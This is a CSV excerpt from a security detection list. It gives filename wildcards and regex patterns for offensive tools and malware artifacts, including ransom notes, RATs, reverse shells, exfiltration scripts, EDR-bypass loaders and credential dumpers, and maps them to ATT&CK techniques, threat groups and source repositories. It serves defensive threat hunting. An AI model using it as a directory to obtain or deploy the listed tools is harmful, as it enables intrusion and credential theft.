"*\how_to_decrypt.hta*",".{0,1000}\\how_to_decrypt\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15825"
"*\HOW_TO_DECRYPT.txt*",".{0,1000}\\HOW_TO_DECRYPT\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15826"
"*\HOW_TO_RECOVER_DATA.html*",".{0,1000}\\HOW_TO_RECOVER_DATA\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15827"
"*\HOW_TO_RECOVER_FILES.txt*",".{0,1000}\\HOW_TO_RECOVER_FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15828"
"*\HOW_TO_RECOVER_FILES_no_personal_id.txt*",".{0,1000}\\HOW_TO_RECOVER_FILES_no_personal_id\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15829"
"*\HOW_TO_RECOVER_FILES_no_personal_id2.txt*",".{0,1000}\\HOW_TO_RECOVER_FILES_no_personal_id2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15830"
"*\HOW_TO_RECOVERY_FILES.txt*",".{0,1000}\\HOW_TO_RECOVERY_FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15831"
"*\How_To_Restore_Your_Files.txt*",".{0,1000}\\How_To_Restore_Your_Files\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15832"
"*\hta_gen.py*",".{0,1000}\\hta_gen\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","15833"
"*\HTMLSmuggler\*",".{0,1000}\\HTMLSmuggler\\.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/D00Movenok/HTMLSmuggler","1","0","N/A","N/A","10","2","162","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z","15834"
"*\htran.exe*",".{0,1000}\\htran\.exe.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","15835"
"*\Htran-master.zip*",".{0,1000}\\Htran\-master\.zip.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","15836"
"*\http_exfiltration.py*",".{0,1000}\\http_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","15837"
"*\http_SCNotification.exe",".{0,1000}\\http_SCNotification\.exe","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","15838"
"*\HTTP-Clear-Text-Password-*.txt*",".{0,1000}\\HTTP\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","15839"
"*\HTTP-Client.ps1*",".{0,1000}\\HTTP\-Client\.ps1.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","15840"
"*\HTTP-NTLMv1-Client-*.txt*",".{0,1000}\\HTTP\-NTLMv1\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","15841"
"*\HTTP-NTLMv2-Client-*.txt*",".{0,1000}\\HTTP\-NTLMv2\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","15842"
"*\httprelayserver.py*",".{0,1000}\\httprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","15843"
"*\http-request-smuggler\*",".{0,1000}\\http\-request\-smuggler\\.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","15844"
"*\https_windows_implant.rs*",".{0,1000}\\https_windows_implant\.rs.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","15845"
"*\HTTP-Server.py*",".{0,1000}\\HTTP\-Server\.py.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","15846"
"*\huan.exe *",".{0,1000}\\huan\.exe\s.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","0","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","15847"
"*\hvnc.exe*",".{0,1000}\\hvnc\.exe.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","15848"
"*\HVNC.sln*",".{0,1000}\\HVNC\.sln.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","15849"
"*\HVNC.vcxproj*",".{0,1000}\\HVNC\.vcxproj.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","15850"
"*\HVNC-main.zip*",".{0,1000}\\HVNC\-main\.zip.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","15851"
"*\HVNC-Server.exe*",".{0,1000}\\HVNC\-Server\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","15852"
"*\HWSyscalls.cpp*",".{0,1000}\\HWSyscalls\.cpp.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","15853"
"*\HWSyscalls-Example.*",".{0,1000}\\HWSyscalls\-Example\..{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","15854"
"*\hXOR.exe*",".{0,1000}\\hXOR\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","15855"
"*\hXOR-Packer v0.1\*",".{0,1000}\\hXOR\-Packer\sv0\.1\\.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","15856"
"*\hXOR-Packer\*",".{0,1000}\\hXOR\-Packer\\.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","15857"
"*\hyperion.exe*",".{0,1000}\\hyperion\.exe.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15858"
"*\Hypnos.exe*",".{0,1000}\\Hypnos\.exe.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","15859"
"*\Hypnos.sln*",".{0,1000}\\Hypnos\.sln.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","15860"
"*\Hypnos.vcxproj*",".{0,1000}\\Hypnos\.vcxproj.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","15861"
"*\Hypnos-main\*",".{0,1000}\\Hypnos\-main\\.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","15862"
"*\iamassumeroleenum.py*",".{0,1000}\\iamassumeroleenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","15863"
"*\iat_obfuscation.exe*",".{0,1000}\\iat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15864"
"*\icebreaker.py*",".{0,1000}\\icebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","15865"
"*\IceRat v 1.0.exe*",".{0,1000}\\IceRat\sv\s1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15866"
"*\icmp_exfiltration.py*",".{0,1000}\\icmp_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","15867"
"*\identify_offencive_tools.log*",".{0,1000}\\identify_offencive_tools\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15869"
"*\IdentifyDomainAdmins.ahk*",".{0,1000}\\IdentifyDomainAdmins\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15870"
"*\IdentifyGroupMembershipActiveUser.ahk*",".{0,1000}\\IdentifyGroupMembershipActiveUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15871"
"*\IDiagnosticProfileUAC*",".{0,1000}\\IDiagnosticProfileUAC.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","N/A","10","2","182","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z","15872"
"*\iepv.cfg*",".{0,1000}\\iepv\.cfg.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15873"
"*\iepv.exe*",".{0,1000}\\iepv\.exe.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15874"
"*\IEPV.EXE-*.pf*",".{0,1000}\\IEPV\.EXE\-.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15875"
"*\iepv.zip.lnk*",".{0,1000}\\iepv\.zip\.lnk.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15876"
"*\iFire-readme.txt*",".{0,1000}\\iFire\-readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15877"
"*\Ignis RAT V1_YKW.exe*",".{0,1000}\\Ignis\sRAT\sV1_YKW\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15878"
"*\IHxExec.cpp*",".{0,1000}\\IHxExec\.cpp.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","15879"
"*\IHxExec.exe*",".{0,1000}\\IHxExec\.exe.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","15880"
"*\IHxExec.vcxproj*",".{0,1000}\\IHxExec\.vcxproj.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","15881"
"*\IHxExec-main*",".{0,1000}\\IHxExec\-main.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","15882"
"*\iis_controller.py*",".{0,1000}\\iis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","15883"
"*\Ikeext-Privesc*",".{0,1000}\\Ikeext\-Privesc.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","15884"
"*\IMAP-Clear-Text-Password-*.txt*",".{0,1000}\\IMAP\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","15885"
"*\Imminent Monitor 3.9.exe*",".{0,1000}\\Imminent\sMonitor\s3\.9\.exe.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","0","N/A","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","15886"
"*\ImminentMonitor.exe*",".{0,1000}\\ImminentMonitor\.exe.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","0","N/A","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","15887"
"*\impacket.*",".{0,1000}\\impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15888"
"*\impacket.zip*",".{0,1000}\\impacket\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","15889"
"*\impacketfile.py*",".{0,1000}\\impacketfile\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","15890"
